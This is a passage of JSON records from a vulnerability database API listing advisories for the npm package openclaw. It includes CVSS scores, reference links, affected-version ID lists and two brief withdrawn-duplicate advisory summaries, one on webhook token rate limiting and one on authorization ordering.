,{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"}
,{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35652","GHSA-8883-9w57-vwv6"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r9j7-ya3h-cbda"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90036?format=json","vulnerability_id":"VCID-r
9y1-z2ax-z3e2","summary":"Duplicate Advisory: OpenClaw: Synology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Webhook Token\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-mf5g-6r6f-ghhm. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.25 contains a pre-authentication rate-limit bypass vulnerability in webhook token validation that allows attackers to brute-force weak webhook secrets. The vulnerability exists because invalid webhook tokens are rejected without throttling repeated authentication attempts, enabling attackers to guess weak tokens through rapid successive requests.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.co
m/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35646","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35646"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation"},{"reference_url":"https://github.com/advisories/GHSA-59xc-5v89-r7pr","reference_id":"GHSA-59xc-5v89-r7pr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-59xc-5v89-r7pr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"v
ulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"v
ulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"v
ulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-59xc-5v89-r7pr"],"risk_score":3.1,"exploitability":"0.5",
"weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r9y1-z2ax-z3e2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89843?format=json","vulnerability_id":"VCID-rf6b-q7cj-jbgc","summary":"Duplicate Advisory: OpenClaw: Tlon cite expansion happens before channel and DM authorization is complete\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-vfg3-pqpq-93m4. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 performs cite expansion before completing channel and DM authorization checks, allowing cite work and content handling prior to final auth decisions. Attackers can exploit this timing vulnerability to access or manipulate content before proper authorization validation occurs.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:
X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35637","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35637"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm"},{"reference_url":"https://github.com/advisories/GHSA-p6j4-wvmc-vx2h","reference_id":"GHSA-p6j4-wvmc-vx2h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p6j4-wvmc-vx2h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulner
ability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulner
ability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf